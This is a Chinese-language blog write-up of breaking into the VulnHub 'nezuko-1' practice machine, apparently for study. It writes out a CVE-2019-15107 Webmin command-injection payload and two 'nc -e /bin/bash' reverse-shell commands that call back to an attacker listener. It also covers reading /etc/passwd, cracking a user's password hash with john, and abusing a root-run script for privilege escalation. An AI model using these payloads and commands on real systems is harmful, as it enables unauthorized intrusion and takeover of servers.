nezuko-1打靶记录

GTL-JU Lv3
  2023-10-17 22:12:46 2023-10-17 22:12 创建   2023-10-17 22:20:39 2023-10-17 22:20 更新    966 字  3 分钟

一、环境搭建

靶机镜像下载地址:https://www.vulnhub.com/entry/nezuko-1%2C352/

image-20231017184036448

然后设置虚拟机名和存储位置

image-20231017184104934

设置网络适配器为nat模式

image-20231017184143582

然后启动虚拟机就可以了。

二、信息收集

发现存活主机

image-20231017192724463

我们可以得到目标靶机的ip是192.168.113.130

端口扫描

1
nmap -sV 192.168.113.130

image-20231017193002658

可以看到目标靶机开放了22(ssh)端口和80(web)端口

三、漏洞挖掘与利用

访问靶机对应的web服务

image-20231017193135097

使用dirsearch扫描靶机的目录

image-20231017193422774

可以看到有一个robots.txt文件和一个sqmple路由

访问robots.txt 文件

image-20231017193514862

1
NBUW45BAMZZG63JANZSXU5LLN4QDUIDUNBUXGIDJOMQG433UEB2GQZJAOJUWO2DUEBYG64TUEB2G6IDFNZ2W2ZLSMF2GKIC6O5PA====

是一段编码的字符串

进行base32解码

image-20231017193607479

发现是给了一个提示:告诉我们这不是枚举的正确端口

访问扫描出来的另一个路由

image-20231017194313523

有一个txt文件里面啥也没有

提示告诉我们端口不对,那么说明我们端口扫描不完全

重新扫描端口

1
nmap -A -T4 -O -p 0-65535 192.168.113.130

image-20231017194411843

可以看到还开放了一个13337端口对应也是web服务

访问这个端口的服务

这里注意要使用https访问

image-20231017211824141

可以看到是一个后台管理登录系统

尝试弱口令爆破

image-20231017212037424

爆破失败,尝试了常见的几个弱口令也没有成功

然后尝试去搜索这个管理系统的历史漏洞

然后搜索到一个CVE-2019-15107是一个远程命令执行漏洞

文章链接:https://blog.csdn.net/qq_24481913/article/details/132043461

尝试进行cve漏洞利用

漏洞利用点在password_change.cgi路由

在重置密码这个路由存在一个代码执行漏洞

paylaod:

1
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

image-20231017213526944

尝试反弹shell

1
user=rootxx&pam=&expired=2&old=test|nc -e /bin/bash 192.168.113.129 4321&new1=test2&new2=test2

image-20231017213822500

kali开启监听4321端口

反弹成功

image-20231017213854292

进入交互模式

1
python -c "import pty;pty.spawn('/bin/bash')"

进入全交互模式失败

image-20231017214242995

四、提权

image-20231017214337851

我们现在只是一个普通用户权限,要想拿下这台服务器就要提升权限

提权最常用的就是suid提权

首先就是查找有s权限的命令

1
find / -user root -perm -4000 -print 2>/dev/null

image-20231017214529391

没有常见的suid提权使用的命令

那么这种方法就不能使用了

这里尝试读取一下/etc/passwd

image-20231017214732424

可以看到zenitsu用户的密码以加密的形式存放在这里

使用john进行解密

image-20231017214934759

解开这个用户的密码是meowmeow

尝试切换用户提权

但是想要使用su命令要切换成全交互式shell

我们这里可以先尝试使用ssh连接

image-20231017215222171

但是连接失败,那就只能尝试切换成全交互式shell

查看靶机安装的python版本

1
which python python2 python3

image-20231017215541184

安装的是python3,这也就是我们刚才用python提升失败的原因

那只用用python3来提升交互模式就行

1
python3 -c 'import pty;pty.spawn("/bin/bash")';

image-20231017215626779

使用su切换到zenitsu用户

image-20231017215712295

切换用户成功

image-20231017215928046

但是并不是root权限

然后再/home/zenitsu/to_nezuko下找到一个有root权限的文件

image-20231017220034339

那么它可以以root权限运行,那我们可以使用它进行反弹shell

尝试写入

1
echo "nc -e /bin/bash 192.168.113.129 4321" > send_message_to_nezuko.sh

image-20231017220328524

但是写入失败了

用lsattr命令可以查看隐藏权限

image-20231017220425516

chattr +a file使file文件只能追加内容,不能删除、重命名,因此可以直接追加内容

image-20231017220518719

查看文件内容

image-20231017220542396

可以看到反弹shell的代码写入成功了

然后运行sh文件反弹shell

image-20231017221042296

kali开启监听

image-20231017221121610

可以看到已经成功拿下这台服务器

  • 标题: nezuko-1打靶记录
  • 作者: GTL-JU
  • 创建于: 2023-10-17 22:12:46
  • 更新于: 2023-10-17 22:20:39
  • 链接: https://gtl-ju.github.io/2023/10/17/nezuko-1打靶记录/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
此页目录
nezuko-1打靶记录
  1. 一、环境搭建
  2. 二、信息收集
    1. 发现存活主机
    2. 端口扫描
  3. 三、漏洞挖掘与利用
  4. 四、提权